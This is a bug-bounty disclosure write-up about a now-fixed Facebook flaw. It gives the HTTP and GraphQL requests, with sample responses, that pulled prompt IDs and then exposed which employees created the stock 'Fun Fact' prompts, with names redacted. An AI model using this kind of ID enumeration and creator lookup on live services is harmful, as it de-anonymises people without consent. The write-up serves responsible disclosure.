Dox Facebook Employees Behind “Did You Know”

Facebook provides various “Did You Know” (aka “Fun Facts”) questions (i.e. prompt) for users to answer.

Supposedly, the identities of the creators (Facebook employees) of such stock Fun Fact prompts should not be accessible by non-employees. But it is accessible as of now.


Reproduction

Step 0: Fetch stock Fun Fact prompts for their IDs

HTTP POST
https://www.facebook.com/profile/fun_facts/single_prompt/fetch

For the purpose this demo, we are going to only fetch three entries instead of all 300-ish of them:

HTTP POST
https://www.facebook.com/profile/fun_facts/single_prompt/fetch?fetch_amount=3

The response with payload should look like this:

for (;;); {
  "__ar": 1,
  "payload": {
    "cursor": "1234567890123456",
    "prompts": [{
      "attribution": "Created by Facebook Fun Fact Prompts",
      "emoji": "💭",
      "id": 307298943011368,
      "isCrowdsourced": false,
      "socialProof": null,
      "title": "The annoying thing about opening a bag of chips is..."
    }, {
      "attribution": "Created by Facebook Fun Fact Prompts",
      "emoji": "🚘",
      "id": 1738516039492152,
      "isCrowdsourced": false,
      "socialProof": null,
      "title": "My dream car is…"
    }, {
      "attribution": "Created by Facebook Fun Fact Prompts",
      "emoji": "🐶",
      "id": 1954295404830420,
      "isCrowdsourced": false,
      "socialProof": null,
      "title": "My first pet's name was..."
    }]
  },
  "bootloadable": {},
  "ixData": {},
  "gkxData": {},
  "lid": "1"
}

Therefore, the IDs of the Fun Facts for this demo will be [307298943011368, 1738516039492152, 1954295404830420]

Based on the value of each’s isCrowdsourced and attribution, we can determine that these three Fun Fact prompts are created by Facebook employees internally.

Proof of Concept

Step 1: Querying using /graphql endpoint

In this request, we are going to use the three IDs of stock Fun Fact prompts obtained from Step 0.

HTTP GET
https://graph.facebook.com/v2.12/graphql?q=nodes(307298943011368,1738516039492152,1954295404830420){fun_fact_prompt_title,fun_fact_prompt_creator{id,name,url}}

The response looks like this (employee info redacted from the original report):

{
  "307298943011368": {
    "fun_fact_prompt_title": "The annoying thing about opening a bag of chips is...",
    "fun_fact_prompt_creator": {
      "id": "1",
      "name": "A Facebook Employee",
      "url": "https://www.facebook.com/..."
    }
  },
  "1738516039492152": {
    "fun_fact_prompt_title": "My dream car is…",
    "fun_fact_prompt_creator": {
      "id": "1",
      "name": "A Facebook Employee",
      "url": "https://www.facebook.com/..."
    }
  },
  "1954295404830420": {
    "fun_fact_prompt_title": "My first pet's name was...",
    "fun_fact_prompt_creator": {
      "id": "1",
      "name": "A Facebook Employee",
      "url": "https://www.facebook.com/..."
    }
  }
}

Based on this response, it indicates these stock Fun Fact prompts are created by (redacted), a “(redacted)” at Facebook. Non-employees should not have access to this information.

Timeline

2018-02-14: Report Submitted

2018-02-16: Further Investigation by Facebook

2018-03-08: Fixed by Facebook

2018-03-13: Bounty Awarded by Facebook